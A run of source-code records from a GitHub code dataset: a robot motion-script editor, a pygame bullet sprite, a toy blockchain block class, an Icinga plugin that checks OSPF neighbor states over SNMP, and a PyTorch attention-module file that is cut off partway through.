# Comment : [\"#\", \"comment description\"]\r\n #############################################################\r\n def CompileScript(self, lstScriptLines):\r\n Result = -1\r\n CompiledScriptLines = list()\r\n\r\n # Check empty script\r\n if len(lstScriptLines) == 0:\r\n return Result, CompiledScriptLines\r\n \r\n LoopCmdStack = list()\r\n UnrecognizedLines = list()\r\n UnrecognizedLines.clear()\r\n\r\n # Parsing each command line\r\n for ln in range(len(lstScriptLines)):\r\n # Convert to upper case\r\n line = lstScriptLines[ln].upper()\r\n\r\n # Split into fields\r\n fields = line.split()\r\n\r\n # Skip empty line\r\n if len(fields) == 0:\r\n continue\r\n\r\n for fn in range(len(fields)):\r\n fields[fn].strip()\r\n\r\n # Parsing each fields\r\n if fields[0] == \"MOVJNT\":\r\n # Check parameter\r\n if len(fields[1:]) != 0:\r\n for fn in range(1,len(fields)):\r\n subfields = fields[fn].split(\"=\")\r\n if fields[fn][0] == \"#\":# Ignore comment\r\n fields = fields[:fn]\r\n break\r\n elif len(subfields) == 2:# Check subfields\r\n if (len(subfields[0])>1) and subfields[0][0] == \"J\":# Get joint number\r\n # Joint number and angle limitation\r\n if int(subfields[0][1:]) <= 8 and abs(int(subfields[1])) <= 180:\r\n continue\r\n elif subfields[0] == \"SPD\":# Get specified speed\r\n # Speed limitation\r\n if abs(int(subfields[1])) <= 1000:\r\n continue\r\n elif subfields[0] == \"ACC\":# Get specified acceleration\r\n # Acceleration limitation\r\n if abs(int(subfields[1])) <= 1000:\r\n continue\r\n UnrecognizedLines.append(ln+1)\r\n break\r\n else:\r\n UnrecognizedLines.append(ln+1)\r\n\r\n elif fields[0] == \"MOVPT\" or fields[0] == \"MOVLN\":\r\n # Check parameter\r\n if len(fields[1:]) != 0:\r\n for fn in range(1,len(fields)):\r\n subfields = fields[fn].split(\"=\")\r\n if fields[fn][0] == \"#\":# Ignore comment\r\n fields = fields[:fn]\r\n break\r\n elif len(subfields) == 1:\r\n if self.CheckPointExist(fields[fn]) == True:# Check point name\r\n continue\r\n elif len(subfields) == 2:# Check subfields\r\n if subfields[0] == \"SPD\":# Get specified speed\r\n # Speed limitation\r\n if abs(int(subfields[1])) <= 1000:\r\n continue\r\n elif subfields[0] == \"ACC\":# Get specified acceleration\r\n # Acceleration limitation\r\n if abs(int(subfields[1])) <= 1000:\r\n continue\r\n UnrecognizedLines.append(ln+1)\r\n break\r\n else:\r\n UnrecognizedLines.append(ln+1)\r\n\r\n elif fields[0] == \"DELAY\":\r\n # Check parameter\r\n if len(fields) < 2 or fields[1].isnumeric() == False:\r\n UnrecognizedLines.append(ln+1)\r\n elif len(fields) > 2 and fields[2][0] != \"#\":\r\n UnrecognizedLines.append(ln+1)\r\n else:\r\n fields[1] = int(fields[1])\r\n # Cut off useless part\r\n fields = fields[:2]\r\n\r\n elif fields[0] == \"LOOP\":\r\n # Check parameter\r\n if len(fields) < 2 or fields[1].isnumeric() == False:\r\n UnrecognizedLines.append(ln+1)\r\n elif len(fields) > 2 and fields[2][0] != \"#\":\r\n UnrecognizedLines.append(ln+1)\r\n else:\r\n # Cut off useless part\r\n fields = fields[:2]\r\n\r\n # Push loop count and line number into stack\r\n LoopCmdStack.append([fields[1], ln])\r\n fields[1] = int(fields[1])\r\n fields.append(0)# Append fields[2] to save \"LOOPEND\" line number\r\n\r\n elif fields[0] == \"LOOPEND\":\r\n # Check parameter\r\n if len(fields) > 1 and fields[1][0] != \"#\":\r\n UnrecognizedLines.append(ln+1)\r\n else:\r\n # Cut off useless part\r\n fields = fields[:1]\r\n\r\n # Pop loop count and line number into stack\r\n fields.append(int(LoopCmdStack[len(LoopCmdStack)-1][0]))#loop count\r\n fields.append(int(LoopCmdStack[len(LoopCmdStack)-1][1]))#loop start line\r\n LoopCmdStack.pop(len(LoopCmdStack)-1)\r\n\r\n # Save back LOOPEND line\r\n CompiledScriptLines[fields[2]][2] = ln\r\n\r\n elif fields[0][0] == \"#\":\r\n pass\r\n\r\n else:\r\n UnrecognizedLines.append(ln+1)\r\n log.debug(\"Compiled line[%d]: cmd=%s, param=%s\\r\\n\", ln+1, fields[0], str(fields[1:]))\r\n\r\n CompiledScriptLines.append(fields)\r\n # End of lines parsing\r\n\r\n # Check LOOP command paires\r\n if len(LoopCmdStack) != 0:\r\n UnrecognizedLines.append(int(LoopCmdStack[0][0])+1)\r\n log.debug(\"Non-emptied LoopCmdStack[]: %s\\r\\n\", str(LoopCmdStack))\r\n\r\n if len(UnrecognizedLines) == 0:\r\n Result = 0\r\n else:\r\n CompiledScriptLines.clear()\r\n\r\n return Result, CompiledScriptLines, UnrecognizedLines\r\n\r\n def LoadScriptFromFile(self):\r\n Result = -1\r\n lstScriptLines = list()\r\n opt = QFileDialog.Options()\r\n opt |= QFileDialog.DontUseNativeDialog\r\n try:\r\n filePath, _ = QFileDialog.getOpenFileName(self, \\\r\n \"Load Script From File\", \\\r\n dctAPP_CFIG[\"SCRIPT_PATH\"], \\\r\n \"motion script file (*.ms)\", \\\r\n options=opt)\r\n\r\n fileName = QFileInfo(filePath).fileName().split(\".\")\r\n log.debug(\"Load from filePath:%s, fileName:%s\\r\\n\", filePath, fileName)\r\n if filePath != \"\" and fileName != \"\":\r\n if len(fileName) < 2:\r\n filePath += \".ms\"\r\n f = open(filePath, \"r\")\r\n # Remove non-printable characters\r\n lstScriptLines = self.FilterOutNonPrintableChar(f.readlines())\r\n f.close()\r\n Result = 0\r\n except Exception as e:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\":[\"Exception\", str(e)]})\r\n finally:\r\n return lstScriptLines, Result\r\n\r\n def SaveScriptToFile(self, lstScriptLines):\r\n opt = QFileDialog.Options()\r\n opt |= QFileDialog.DontUseNativeDialog\r\n try:\r\n filePath, _ = QFileDialog.getSaveFileName(self, \\\r\n \"Save Script To File\", \\\r\n dctAPP_CFIG[\"SCRIPT_PATH\"], \\\r\n \"motion script file (*.ms)\", \\\r\n options=opt)\r\n\r\n fileName = QFileInfo(filePath).fileName().split(\".\")\r\n log.debug(\"Save to filePath:%s, fileName:%s\\r\\n\", filePath, fileName)\r\n if filePath != \"\" and fileName != \"\":\r\n if len(fileName) < 2:\r\n filePath += \".ms\"\r\n f = open(filePath, \"w\")\r\n for line in lstScriptLines:\r\n f.write(line+\"\\n\")\r\n f.close()\r\n except Exception as e:\r\n self.MotionCtrl.sigMainWinEventHandler.emit({\"SetMsgBox\":[\"Exception\", str(e)]})\r\n finally:\r\n pass\r\n\r\n def FilterOutNonPrintableChar(self, lines):\r\n for ln in range(len(lines)):\r\n filtedLine = \"\"\r\n for c in lines[ln]:\r\n if c.isprintable():\r\n filtedLine += c\r\n lines[ln] = filtedLine\r\n return lines\r\n\r\n def CheckPointExist(self, PointName):\r\n return self.MotionCtrl.Conn.pExist(PointName)\r\n\r\n#End of Class frmScriptEditor","repo_name":"MyRobot-lab/AxRobotUtility","sub_path":"frmScriptEditor.py","file_name":"frmScriptEditor.py","file_ext":"py","file_size_in_byte":23753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21710778500","text":"from typing import Any\nimport pygame\n\nfrom pygame.sprite import Sprite\n\n\nclass Bullet(Sprite):\n '''Клас для управления пулями'''\n\n\n def __init__(self, ai_settings, screen, ship):\n '''Создание обьекта пули в текущей позиции карабля'''\n super().__init__()\n self.screen = screen\n\n self.rect = pygame.Rect(\n 0, 0, ai_settings.bullet_wigth, ai_settings.bullet_height)\n self.rect.centerx = ship.rect.centerx\n self.rect.top = ship.rect.top\n\n # позиция сохраняется в вещественном ввиде\n self.y = float(self.rect.y)\n\n self.color = ai_settings.bullet_color\n self.speed_factor = ai_settings.bullet_speed_factor\n\n\n def update(self):\n self.y -= self.speed_factor\n self.rect.y = self.y\n\n\n def draw_bullet(self):\n pygame.draw.rect(self.screen, self.color, self.rect)\n","repo_name":"Dmitriy-Solomahin/Alien_invasion","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70057515321","text":"import time\nimport hashlib\nfrom typing import List\n\nfrom transaction import Transaction\n\n# block holds transactions i.e. list of assignment details\nclass Block:\n def __init__(self, pending_transactions: List[Transaction]) -> None:\n self.timestamp = time.time() \n self.transactions = pending_transactions # transactions that have yet to be added to a block\n self.hash = None \n self.previous_hash = None\n \n def calculate_hash(self) -> str:\n block_string = str(self.timestamp) + str(self.previous_hash) \n\n # linearly combine transaction hashes into one common string\n for transaction in self.transactions:\n block_string += str(transaction)\n\n self.hash = hashlib.sha256(block_string.encode('utf-8')).hexdigest()\n return self.hash\n \n def to_dict(self):\n return {\n \"hash\": self.hash,\n \"timestamp\": self.timestamp,\n \"transactions\": [transaction.to_dict() for transaction in self.transactions],\n \"hash\": self.hash\n }\n","repo_name":"pdscorg/Blockchain-Fellowship","sub_path":"Day 0/part-3-blockchain/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"29328524855","text":"#!/usr/bin/env python3\n\n'''\n Icinga (Nagios) plugin that checks the status of OSPF neighbors on a Cisco IOS Router.\n\n The check returns OK if the neighbor state is 2WAY or FULL.\n Without any optional arguments, returns OK if any OSPF neighbors are detected.\n\n Optional arguments can be passed to match a specific neighbor Router ID (RID) or interface IP to look for.\n In that case a CRITICAL will be generated if that specific neighbor is down.\n\n In case multiple IP's or RID's are provided, a WARNING is generated if any of them is not 2WAY or FULL.\n If you set both IP's and RID's, only the IP's will be checked.\n'''\n\n__version__ = 'v0.22'\n__author__ = 'raoul@node00.nl'\n\nimport sys\nimport argparse\nimport subprocess\nimport re\n\n\ndef ok(msg):\n print('OK:', msg)\n sys.exit(0)\n\n\ndef warning(msg):\n print('WARNING:', msg)\n sys.exit(1)\n\n\ndef critical(msg):\n print('CRITICAL:', msg)\n sys.exit(2)\n\n\ndef unknown(msg):\n print('UNKNOWN:', msg)\n sys.exit(3)\n\n\ndef error(msg):\n print('ERROR:', msg)\n sys.exit(3)\n\n\ndef check_ospf(snmp_check_values):\n\n ospf_states = {\n 1 : 'DOWN',\n 2 : 'ATTEMPT',\n 3 : 'INIT',\n 4 : '2WAY',\n 5 : 'EXSTART',\n 6 : 'EXCHANGE',\n 7 : 'LOADING',\n 8 : 'FULL'\n }\n\n # Save all gathered data to dictionary\n ospf_neighbor_data = {}\n\n ### DEBUG OUTPUT\n\n if snmp_check_values['debug']:\n print('\\n // DEBUG snmp_check_values\\n')\n for key,value in sorted(snmp_check_values.items()):\n print(' {key:20} {value}'.format(**locals()))\n print('\\n // DEBUG ospf_states\\n')\n for key, value in sorted(ospf_states.items()):\n print(' {key}: {value}'.format(**locals()))\n\n ### GET DATA\n\n ## Run snmpwalk commands\n\n try:\n\n # snmpwalk: get OSPF neighbor interface IP's (read: next-hops)\n command_output_ospf_ip = subprocess.check_output(\n [\n 'snmpwalk', '-v', '2c', '-c',\n snmp_check_values['community'],\n snmp_check_values['host'],\n snmp_check_values['ospfNbrIpAddr']\n ]\n )\n\n # snmpwalk: get OSPF neighbor router ID's\n command_output_ospf_rid = subprocess.check_output(\n [\n 'snmpwalk', '-v', '2c', '-c',\n snmp_check_values['community'],\n snmp_check_values['host'],\n snmp_check_values['ospfNbrRtrId']\n ]\n )\n\n # snmpwalk: get OSPF neighbor states\n command_output_ospf_state = subprocess.check_output(\n [\n 'snmpwalk', '-v', '2c', '-c',\n snmp_check_values['community'],\n snmp_check_values['host'],\n snmp_check_values['ospfNbrState']\n ]\n )\n\n except:\n\n msg = 'Something went wrong with subprocess command \\'snmpwalk\\''\n msg += '\\nIs the host ' + snmp_check_values['host'] + ' reachable?'\n msg += '\\nIs it configured to accept SNMP polls from this host?'\n msg += '\\nIs SNMP community string \\'' + snmp_check_values['community'] + '\\' valid?'\n\n error(msg)\n\n ## Parse snmpwalk commands\n\n try:\n\n # Parse command output: OSPF neighbor router interface IP's\n command_output_ospf_ip_list = command_output_ospf_ip.decode().split('\\n')\n # Parse command output: OSPF router ID's\n command_output_ospf_rid_list = command_output_ospf_rid.decode().split('\\n')\n # Parse command output: OSPF router states\n command_output_ospf_state_list = command_output_ospf_state.decode().split('\\n')\n\n ## Validate SNMP output\n\n # If you try to use this plugin on a non-Cisco IOS router, this happens\n for item in command_output_ospf_ip_list:\n if 'No Such Object available on this agent at this OID' in item:\n msg = 'SNMP OID not found: 1.3.6.1.2.1.14.10.1.1 (ospfNbrIpAddr). \\\n \\nAre you sure this is a Cisco IOS router?'\n error(msg)\n\n ## Parse lists to dictionary\n\n ## Parse router IP's\n\n count = 1\n for item in command_output_ospf_ip_list:\n # Start building dictionary\n neighbor_name = 'Neighbor' + str(count).zfill(2)\n count += 1\n chunks = item.split()\n if len(chunks) == 4:\n ip_address = chunks[3]\n # Create a dictionary with key: 'NeighborXX' and value: list of wanted info\n ospf_neighbor_data[neighbor_name] = ['Neighbor IP', ip_address]\n\n ## Parse router ID's\n\n for item in command_output_ospf_rid_list:\n # Find matching key/value pair in dictionary, so we can add the RID's we find to the correct pair\n chunks = item.split()\n if len(chunks) == 4:\n # Search for RID in ospfNbrRtrId\n for key, value in ospf_neighbor_data.items():\n result = re.search(value[1], chunks[0])\n if result:\n ospf_neighbor_data[key].append('RID')\n ospf_neighbor_data[key].append(chunks[3])\n\n ## Parse OSPF neighbor states\n\n for item in command_output_ospf_state_list:\n chunks = item.split()\n if len(chunks) == 4:\n for key, value in ospf_neighbor_data.items():\n result = re.search(value[1], chunks[0])\n if result:\n ospf_neighbor_data[key].append('State')\n ospf_neighbor_data[key].append(chunks[3])\n\n ### DEBUG OUTPUT\n\n if snmp_check_values['debug']:\n\n print('\\n // DEBUG ospf_neighbor_data\\n')\n print(' {:15} {}'.format('Name', 'Data'))\n print(' {:15} {}'.format('-----', '-------------------------'))\n for key, value in sorted(ospf_neighbor_data.items()):\n print(' {key:15} {value}'.format(**locals()))\n print()\n\n\n ### EVALUATE DATA USING USER INPUT\n\n msg_ospf_state_warning = ''\n ospf_neighbors_down = 0\n ospf_neighbors_up = 0\n ospf_neighbors_evaluated = 0\n ospf_neighbors_total = len(ospf_neighbor_data.keys())\n\n # Check if specified IP's/RID's are actually found\n neighbors_found_set = set()\n neighbors_to_check_set = set()\n\n for key, value in ospf_neighbor_data.items():\n\n current_ip = value[1]\n current_rid = value[3]\n ospf_status = int(value[5])\n\n ## IP: Check for specified IP(s)\n\n if snmp_check_values['ip']:\n for item in snmp_check_values['ip']:\n # Build a set of specified values\n neighbors_to_check_set.add(item)\n # item is one of the IP's from user input\n if item == current_ip:\n # Build a set of matched values\n neighbors_found_set.add(item)\n # If not 2WAY or FULL create warning message\n if not ospf_status == 4 and not ospf_status == 8:\n # If encountered before, add separator // to string\n if msg_ospf_state_warning:\n msg_ospf_state_warning += ' // '\n\n warning_msg = 'OSPF neigbor IP ' + current_ip + ' and RID ' + current_rid + ' has state ' + \\\n ospf_states[ospf_status]\n\n msg_ospf_state_warning += warning_msg\n ospf_neighbors_down += 1\n ospf_neighbors_evaluated += 1\n\n # .. else, if 2WAY or FULL neighbor detected, just count it\n if ospf_status == 4 or ospf_status == 8:\n ospf_neighbors_up += 1\n ospf_neighbors_evaluated += 1\n\n ## RID: Check for specified RID(s)\n\n elif snmp_check_values['rid']:\n for item in snmp_check_values['rid']:\n neighbors_to_check_set.add(item)\n # item is one of the IP's from user input\n if item == current_rid:\n neighbors_found_set.add(item)\n # If not 2WAY or FULL create warning message\n if not ospf_status == 4 and not ospf_status == 8:\n # If encountered before, add separator // to string\n if msg_ospf_state_warning:\n msg_ospf_state_warning += ' // '\n\n warning_msg = 'OSPF neigbor IP ' + current_ip + ' and RID ' + current_rid + ' has state ' + \\\n ospf_states[ospf_status]\n\n msg_ospf_state_warning += warning_msg\n ospf_neighbors_down += 1\n ospf_neighbors_evaluated += 1\n\n # .. else, if 2WAY or FULL neighbor detected, just count it\n if ospf_status == 4 or ospf_status == 8:\n ospf_neighbors_up += 1\n ospf_neighbors_evaluated += 1\n\n else:\n # If not 2WAY or FULL create warning message\n if not ospf_status == 4 and not ospf_status == 8:\n # If encountered before, add separator // to string\n if msg_ospf_state_warning:\n msg_ospf_state_warning += ' // '\n\n warning_msg = 'OSPF neigbor IP ' + current_ip + ' and RID ' + current_rid + ' has state ' + \\\n ospf_states[ospf_status]\n\n msg_ospf_state_warning += warning_msg\n ospf_neighbors_down += 1\n ospf_neighbors_evaluated += 1\n\n # .. else, if 2WAY or FULL neighbor detected, just count it\n if ospf_status == 4 or ospf_status == 8:\n ospf_neighbors_up += 1\n ospf_neighbors_evaluated += 1\n\n ### EVALUATE RESULTS AND GENERATE OUTPUT\n\n # Spelling is important\n extra_s = ''\n if ospf_neighbors_up > 1:\n extra_s = 's'\n\n # Totals\n msg_totals = ' (' + str(ospf_neighbors_up) + ' neighbor' + extra_s + ' up out of ' + str(ospf_neighbors_evaluated) + \\\n ' checked, ' + str(ospf_neighbors_total) + ' detected)'\n\n # Perf data\n msg_perfdata = ' | ospf_neighbors=' + str(ospf_neighbors_up)\n\n # WARNING: Warnings detected\n if msg_ospf_state_warning:\n warning(msg_ospf_state_warning + msg_totals + msg_perfdata)\n\n # CRITICAL: Not all neighbours found\n if snmp_check_values['min_neighbors'] > ospf_neighbors_up:\n msg = str(ospf_neighbors_up) + ' OSPF neighbor' + extra_s + ' detected (Required: ' + \\\n str(snmp_check_values['min_neighbors']) + ')'\n critical(msg + msg_totals + msg_perfdata)\n\n # CRITICAL: Specified neighbor not found\n neighbors_not_found_set = neighbors_to_check_set.difference(neighbors_found_set)\n\n if not len(neighbors_not_found_set) == 0:\n msg = 'Could not find:'\n for item in neighbors_not_found_set:\n msg += ' ' + item\n critical(msg + msg_totals + msg_perfdata)\n\n # OK\n msg = str(ospf_neighbors_up) + ' OSPF neighbor' + extra_s + ' in state 2WAY or FULL'\n ok(msg + msg_totals + msg_perfdata)\n\n # Catch own sys.exit in case it was called and exit gracefully\n except SystemExit:\n raise\n\n # On all other exceptions quit with an error\n except:\n msg = 'Something went wrong parsing data. Probably wrong SNMP OID for this device.'\n error(msg)\n\n\ndef main():\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n description='Icinga (Nagios) plugin that checks the status of OSPF neighbors on a Cisco IOS router.\\\n The check returns OK if the neighbor state is 2WAY or FULL.\\\n Without any optional arguments, returns OK if any OSPF neighbors are detected.\\\n Optional arguments can be passed to match a specific neighbor Router ID (RID) or interface IP to look for.\\\n In that case a CRITICAL will be generated if that specific neighbor is down.\\\n In case multiple IP\\'s or RID\\'s are provided, a WARNING is generated if any of them is not 2WAY or FULL.\\\n If you set both IP\\'s and RID\\'s, only the IP\\'s will be checked.',\n epilog='Written in Python 3.'\n )\n parser.add_argument('--version', action='version', version=__version__)\n parser.add_argument('--debug', action='store_true', help='debug output')\n parser.add_argument('SNMP_COMMUNITY', type=str, help='the SNMP community string of the remote device')\n parser.add_argument('HOST', type=str, help='the IP of the remote host you want to check')\n parser.add_argument('-r', '--rid', type=str, help='OSPF neighbor router ID (multiple possible separated by a comma \\\n and in-between quotes)')\n parser.add_argument('-i', '--ip', type=str, help='OSPF neighbor IP (multiple possible separated by a comma \\\n and in-between quotes)')\n parser.add_argument('-n', '--number', type=int, help='Minimum number of OSPF neighbors required (overrides --ip )')\n args = parser.parse_args()\n\n # Default values\n snmp_check_values = {\n 'community' : args.SNMP_COMMUNITY,\n 'host' : args.HOST,\n 'ospfNbrIpAddr' : '1.3.6.1.2.1.14.10.1.1',\n 'ospfNbrRtrId' : '1.3.6.1.2.1.14.10.1.3',\n 'ospfNbrState' : '1.3.6.1.2.1.14.10.1.6',\n 'rid' : None,\n 'ip' : None,\n 'min_neighbors' : None,\n 'debug' : False\n }\n\n # Debug mode enabled?\n if args.debug:\n snmp_check_values['debug'] = True\n\n # RID set?\n if args.rid:\n rid_list = [args.rid]\n # Check if multiple RID's are given\n if ',' in args.rid:\n rid_list = []\n # Separate IP's by comma\n rid_list_raw = args.rid.split(',')\n # Strip whitespace from IP's\n for item in rid_list_raw:\n # Make sure results are strings (not lists) by using index 0\n rid_list.append(item.split()[0])\n\n snmp_check_values['rid'] = rid_list\n\n\n # Neighbor IP set?\n if args.ip:\n ip_address_list = [args.ip]\n # Check if multiple IP's are given\n if ',' in args.ip:\n ip_address_list = []\n # Separate IP's by comma\n ip_address_list_raw = args.ip.split(',')\n # Strip whitespace from IP's\n for item in ip_address_list_raw:\n # Make sure results are strings (not lists) by using index 0\n ip_address_list.append(item.split()[0])\n\n snmp_check_values['ip'] = ip_address_list\n\n\n # Minimum amount of OSPF neighbors set?\n if args.number:\n snmp_check_values['min_neighbors'] = args.number\n else:\n snmp_check_values['min_neighbors'] = 0\n\n\n # Check OSPF status\n check_ospf(snmp_check_values)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n# Copyright (c) 2014, raoul@node00.nl\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.","repo_name":"critikaster/check_ospf.py","sub_path":"check_ospf.py","file_name":"check_ospf.py","file_ext":"py","file_size_in_byte":16856,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"1139872219","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport functools\nimport math\nimport numbers\n\nfrom scripts.utils.model_init import *\nfrom scripts.models.vgg import Vgg16\nfrom scripts.models.blocks import *\n\n\ndef calc_mean_std(feat, eps=1e-5):\n # eps is a small value added to the variance to avoid divide-by-zero.\n size = feat.size()\n assert (len(size) == 4)\n N, C = size[:2]\n feat_var = feat.view(N, C, -1).var(dim=2) + eps\n feat_std = feat_var.sqrt().view(N, C, 1, 1)\n feat_mean = feat.view(N, C, -1).mean(dim=2).view(N, C, 1, 1)\n return feat_mean, feat_std\n\n\ndef adaptive_instance_normalization(content_feat, style_feat):\n assert (content_feat.size()[:2] == style_feat.size()[:2])\n size = content_feat.size()\n style_mean, style_std = calc_mean_std(style_feat)\n content_mean, content_std = calc_mean_std(content_feat)\n\n normalized_feat = (content_feat - content_mean.expand(\n size)) / content_std.expand(size)\n return normalized_feat * style_std.expand(size) + style_mean.expand(size)\n \n\n# From https://discuss.pytorch.org/t/is-there-anyway-to-do-gaussian-filtering-for-an-image-2d-3d-in-pytorch/12351/3\nclass GaussianSmoothing(nn.Module):\n \"\"\"\n Apply gaussian smoothing on a\n 1d, 2d or 3d tensor. Filtering is performed seperately for each channel\n in the input using a depthwise convolution.\n Arguments:\n channels (int, sequence): Number of channels of the input tensors. Output will\n have this number of channels as well.\n kernel_size (int, sequence): Size of the gaussian kernel.\n sigma (float, sequence): Standard deviation of the gaussian kernel.\n dim (int, optional): The number of dimensions of the data.\n Default value is 2 (spatial).\n \"\"\"\n def __init__(self, channels, kernel_size, sigma, dim=2):\n super(GaussianSmoothing, self).__init__()\n if isinstance(kernel_size, numbers.Number):\n kernel_size = [kernel_size] * dim\n if isinstance(sigma, numbers.Number):\n sigma = [sigma] * dim\n\n # The gaussian kernel is the product of the\n # gaussian function of each dimension.\n kernel = 1\n meshgrids = torch.meshgrid(\n [\n torch.arange(size, dtype=torch.float32)\n for size in kernel_size\n ]\n )\n for size, std, mgrid in zip(kernel_size, sigma, meshgrids):\n mean = (size - 1) / 2\n kernel *= 1 / (std * math.sqrt(2 * math.pi)) * \\\n torch.exp(-((mgrid - mean) / (2 * std)) ** 2)\n\n # Make sure sum of values in gaussian kernel equals 1.\n kernel = kernel / torch.sum(kernel)\n\n # Reshape to depthwise convolutional weight\n kernel = kernel.view(1, 1, *kernel.size())\n kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1))\n\n self.register_buffer('weight', kernel)\n self.groups = channels\n\n if dim == 1:\n self.conv = F.conv1d\n elif dim == 2:\n self.conv = F.conv2d\n elif dim == 3:\n self.conv = F.conv3d\n else:\n raise RuntimeError(\n 'Only 1, 2 and 3 dimensions are supported. Received {}.'.format(dim)\n )\n\n def forward(self, input):\n \"\"\"\n Apply gaussian filter to input.\n Arguments:\n input (torch.Tensor): Input to apply gaussian filter on.\n Returns:\n filtered (torch.Tensor): Filtered output.\n \"\"\"\n return self.conv(input, weight=self.weight, groups=self.groups)\n\nclass ChannelPool(nn.Module):\n def __init__(self,types):\n super(ChannelPool, self).__init__()\n if types == 'avg': \n self.poolingx = nn.AdaptiveAvgPool1d(1)\n elif types == 'max':\n self.poolingx = nn.AdaptiveMaxPool1d(1)\n else:\n raise 'inner error'\n\n def forward(self, input):\n n, c, w, h = input.size()\n input = input.view(n,c,w*h).permute(0,2,1) \n pooled = self.poolingx(input)# b,w*h,c -> b,w*h,1\n _, _, c = pooled.size()\n return pooled.view(n,c,w,h)\n\nclass RegionalSkipConnect(nn.Module):\n \"\"\"docstring for RegionalSkipConnect\"\"\"\n def __init__(self,channel):\n super(RegionalSkipConnect, self).__init__()\n self.rconv1 = nn.Conv2d(channel,channel*2,3,padding=1,bias=False)\n self.rbn1 = nn.BatchNorm2d(channel*2)\n self.rconv2 = nn.Conv2d(channel*2,channel,3,padding=1,bias=False)\n self.rbn2 = nn.BatchNorm2d(channel)\n\n def forward(self,feature):\n return F.elu(self.rbn2(self.rconv2(F.elu(self.rbn1(self.rconv1(feature)))))) \n\nclass NNSkipConnect(nn.Module):\n \"\"\"docstring for RegionalSkipConnect\"\"\"\n def __init__(self,channel):\n super(NNSkipConnect, self).__init__()\n self.rconv1 = nn.Conv2d(channel,channel*2,3,padding=1,bias=False)\n self.rbn1 = nn.BatchNorm2d(channel*2)\n self.rconv2 = nn.Conv2d(channel*2,channel,3,padding=1,bias=False)\n self.rbn2 = nn.BatchNorm2d(channel)\n\n def forward(self,feature,mask=None):\n return F.elu(self.rbn2(self.rconv2(F.elu(self.rbn1(self.rconv1(feature)))))) \n\n\nclass GlobalAttentionModule(nn.Module):\n \"\"\"docstring for GlobalAttentionModule\"\"\"\n def __init__(self, channel,reducation=16):\n super(GlobalAttentionModule, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel*2,channel//reducation),\n nn.ReLU(inplace=True),\n nn.Linear(channel//reducation,channel),\n nn.Sigmoid())\n \n def forward(self,x):\n b,c,w,h = x.size()\n y1 = self.avg_pool(x).view(b,c)\n y2 = self.max_pool(x).view(b,c)\n y = self.fc(torch.cat([y1,y2],1)).view(b,c,1,1)\n return x*y\n\nclass SpatialAttentionModule(nn.Module):\n \"\"\"docstring for SpatialAttentionModule\"\"\"\n def __init__(self, channel,reducation=16):\n super(SpatialAttentionModule, self).__init__()\n self.avg_pool = ChannelPool('avg')\n self.max_pool = ChannelPool('max')\n self.fc = nn.Sequential(\n nn.Conv2d(2,reducation,7,stride=1,padding=3),\n nn.ReLU(inplace=True),\n nn.Conv2d(reducation,1,7,stride=1,padding=3),\n nn.Sigmoid())\n \n def forward(self,x):\n b,c,w,h = x.size()\n y1 = self.avg_pool(x)\n y2 = self.max_pool(x)\n y = self.fc(torch.cat([y1,y2],1))\n return x*y\n\n\n\n\nclass GlobalAttentionModuleJustSigmoid(nn.Module):\n \"\"\"docstring for GlobalAttentionModule\"\"\"\n def __init__(self, channel,reducation=16):\n super(GlobalAttentionModuleJustSigmoid, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel*2,channel//reducation),\n nn.ReLU(inplace=True),\n nn.Linear(channel//reducation,channel),\n nn.Sigmoid())\n \n def forward(self,x):\n b,c,w,h = x.size()\n y1 = self.avg_pool(x).view(b,c)\n y2 = self.max_pool(x).view(b,c)\n y = self.fc(torch.cat([y1,y2],1)).view(b,c,1,1)\n return y\n\nclass RegionalAttentionMask(nn.Module):\n \"\"\"docstring for RegionalAttentionConnect\"\"\"\n def __init__(self,channel,type_of_connection=RegionalSkipConnect):\n super(RegionalAttentionMask, self).__init__()\n self.connection = type_of_connection(channel)\n\n def forward(self,feature,mask):\n _,_,w,_ = feature.size()\n _,_,mw,_ = mask.size()\n # binaryfiy\n mask = 